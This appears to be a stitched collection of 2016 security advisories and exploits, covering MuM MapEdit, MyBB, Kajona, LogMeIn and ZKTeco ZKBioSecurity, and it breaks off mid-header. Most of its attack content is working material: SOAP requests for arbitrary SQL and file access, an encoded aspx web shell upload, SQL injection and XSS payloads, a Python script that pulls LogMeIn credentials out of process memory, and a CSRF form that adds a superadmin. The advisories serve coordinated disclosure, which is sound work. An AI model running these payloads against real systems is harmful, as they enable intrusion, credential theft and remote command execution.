## Fixed Versions
According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly
already fixed in version 5.1.
## Authentication via GET Parameter
The application requires users to provide their credentials via GET Parameters. They can therefore
possibly be found in server logs or proxy logs. An example URL would be:
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
## Execution of arbitrary SQL commands on contained SQLite DBs
The application contains several SQLite databases. An authenticated user may send POST requests to
the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries
on the databases.
The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be
decoded to the following XML data:
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
</s:Header>
<s:Body>
<QueryData>
<connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<b:CurrentRepresentation>
<b:CollectionFeatureClassName/>
<b:Id>0</b:Id>
<b:LineFeatureClassName/>
<b:Name/>
<b:PointFeatureClassName/>
<b:PolygonFeatureClassName/>
</b:CurrentRepresentation>
<b:DbVersion>999</b:DbVersion>
<b:Id>0</b:Id>
<b:Name>SYSTEM</b:Name>
<b:StorageSchemaType>Unknown</b:StorageSchemaType>
<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
<queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Columns/>
<b:SRID>0</b:SRID>
</queryDefinition>
<parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<startRow>1</startRow>
<bufferSize>2000</bufferSize>
<limit>0</limit>
</QueryData>
</s:Body>
</s:Envelope>
The node "Filename" can be used to access different SQLite databases on the system, while the node
"sql" contains the SQL-query to be executed on the system.
Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
</s:Header>
<s:Body>
<QueryDataResponse>
<QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
<c:FetchedAllRows>true</c:FetchedAllRows>
<c:ResultColumns>
<c:DbColumnDefinition>
<c:Caption>NAME</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>NAME</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>CAPTION</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>CAPTION</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>VERSION_SYSTEMDATA</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>true</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>40</c:Length>
<c:Name>VERSION_SYSTEMDATA</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
</c:ResultColumns>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</QueryDataResult>
</QueryDataResponse>
</s:Body>
</s:Envelope>
The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data"
contains the result of the SQL-query as an Base64-encoded zlib-compressed data:
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
The same result can be produced, when the database is locally read:
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id
in (select Project_id from usergroup_project where usergroup_id
in (select usergroup_id from user_usergroup where user_id
in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
## Arbitrary file manipulation
By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to
perform several actions.
Most interesting, from an attacker's point of view, would be the following:
- "GetFileName", which lists files in a given folder
- "DownloadFile", which enables the user to download any file the web server has read-access to
- "UploadFile", which allows to upload files to folders the web server has write-access to
The different activities are documented in the subsections below.
As well as in the SQL execution section, the request and response content is decoded from NBFS for
better readability.
### File exploration
An authenticated user is able to list all files in a given folder by sending the following content
to the IO Service.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<GetFileNames>
<path>[path_to_webroot]</path>
<searchPattern>*.*</searchPattern>
<recursive>false</recursive>
</GetFileNames>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
</s:Header>
<s:Body>
<GetFileNamesResponse>
<GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d:string>clientaccesspolicy.xml</d:string>
<d:string>crossdomain.xml</d:string>
<d:string>iisstart.htm</d:string>
<d:string>index.html</d:string>
<d:string>index.php</d:string>
<d:string>Thumbs.db</d:string>
<d:string>web.config</d:string>
<d:string>welcome.png</d:string>
</c:FileNames>
<c:Path>[path_to_webroot]</c:Path>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</GetFileNamesResult>
</GetFileNamesResponse>
</s:Body>
</s:Envelope>
### Download of arbitrary files
The same web service can be abused to download any file, that the web server user has read-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<DownloadFile>
<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
</DownloadFile>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
</s:Header>
<s:Body>
<DownloadFileResponse>
<DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>
<b:FileNotFound>false</b:FileNotFound>
<b:IsComplete>true</b:IsComplete>
</DownloadFileResult>
</DownloadFileResponse>
</s:Body>
</s:Envelope>
The node "Data" itself can be base64-decoded, to receive the file contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Admin</title>
<meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
<p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
### Upload of arbitrary files
The web service can be abused to upload a file to any folder, that the web server user has
write-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<UploadFile>
<clientFilename/>
<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
<data>eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw==</data>
<append>false</append>
<completed>true</completed>
</UploadFile>
</s:Body>
</s:Envelope>
The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue
arbitrary commands on the compromised host.
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
</s:Header>
<s:Body>
<UploadFileResponse>
<UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter/>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</UploadFileResult>
</UploadFileResponse>
</s:Body>
</s:Envelope>
## Base64 encoded Passwords
In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and
"connection". Both tables store their passwords in plain text with base64 encoding applied.
Example:
sqlite> select * from user where name='MUM';
<User GUID>|MUM|<base64 encoded password>|1||
## Remark about information disclosures
Observing the communication between a MapEdit Silverlight client and its backend server, various
information could be gathered, particularly file paths and license keys. Additionally the error
messages, that the server generates discloses quite a lot of information about the backend parsing
process.
## History
2016-06-07 Discovery of mentioned vulnerabilities
2016-06-09 First contact with MuM
2016-06-23 confirmation of mentioned vulnerabilities
2016-07-29 Release of version 6.2.74
2016-09-13 Public disclosure
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
FROM ".TABLE_PREFIX."threads t
LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
LIMIT $start, $perpage
");
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Kajona 4.7
Fixed in: 5.0
Fixed Version Link: https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.
In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='
Code:
core/module_system/system/class_request_dispatcher.php
$strReturn = "<html><head></head><body onload=\"parent.location = '" . urldecode(getGet("peRefreshPage")) . "';\"></body></html>";
XSS 2: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid id is required.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#
Click on "Accept" overlay of an image to trigger the injected code.
XSS 3: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<a xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'><a%3abody onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=class_messageprovider_exceptions
XSS 4: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.
Proof of Concept:
1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment
2. As subject, use:
');alert('1
3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)
Directory Traversal
When viewing images, the file name is improperly sanitized, allowing for
directory traversal.
It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.
Proof of Concept:
GET /kajona/image.php?image=/files/images/upload/....//....//....//download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)
GET /kajona/image.php?image=/files/images/upload/....//....//....//foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404
Code:
core/module_system/image.php
public function __construct() {
//find the params to use
$this->strFilename = urldecode(getGet("image"));
//avoid directory traversing
$this->strFilename = str_replace("../", "", $this->strFilename);
[...]
}
[...]
private function resizeImage() {
//Load the image-dimensions
if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
[...]
}
class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
class_response_object::getInstance()->sendHeaders();
}
4. Solution
To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-Traversal-163.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The issue exist due to the way visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
username value with the password '123456' to authenticate and disclose sensitive
information and/or do unauthorized actions.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
18.07.2016
--
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------
1: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
2: <%@page import="com.zk.common.util.EnvironmentUtil"%>
3: <%
4: String path = request.getContextPath();
5: String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
6:
7: String ip= EnvironmentUtil.getClientIp(request);
8: if("0:0:0:0:0:0:0:1".equals(ip))
9: {
10: ip = "127.0.0.1";
11: }
12:
13: %>
14: <jsp:include page="login.jsp"/>
15: <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
16:
17: <script>
18: function autoLogin()
19: {
20: $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
21: $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
22: var ip = "<%=ip%>";
23: $("#userLoginForm input[name='username']").val(ip);
24: $("#userLoginForm input[name='password']").val("123456");
25: $('#userLoginForm').submit();
26: }
27: window.onload=autoLogin;
28: </script>
---------------------------------------------------------------------------------
<!--
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="authUser.username" value="thricer" />
<input type="hidden" name="authUser.loginPwd" value="111111" />
<input type="hidden" name="repassword" value="111111" />
<input type="hidden" name="authUser.isActive" value="true" />
<input type="hidden" name="authUser.isSuperuser" value="true" />
<input type="hidden" name="groupIds" value="1" />
<input type="hidden" name="deptIds" value="1" />
<input type="hidden" name="areaIds" value="1" />
<input type="hidden" name="authUser.email" value="lab@zeroscience.mk" />
<input type="hidden" name="authUser.name" value="test" />
<input type="hidden" name="authUser.lastName" value="lasttest" />
<input type="hidden" name="fingerTemplate" value=" " />
<input type="hidden" name="fingerId" value=" " />
<input type="hidden" name="logMethod" value="add" />
<input type="hidden" name="un" value="1471451964349_2769" />
<input type="hidden" name="systemCode" value="base" />
<input type="submit" value="Go" />
</form>
</body>
</html>
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
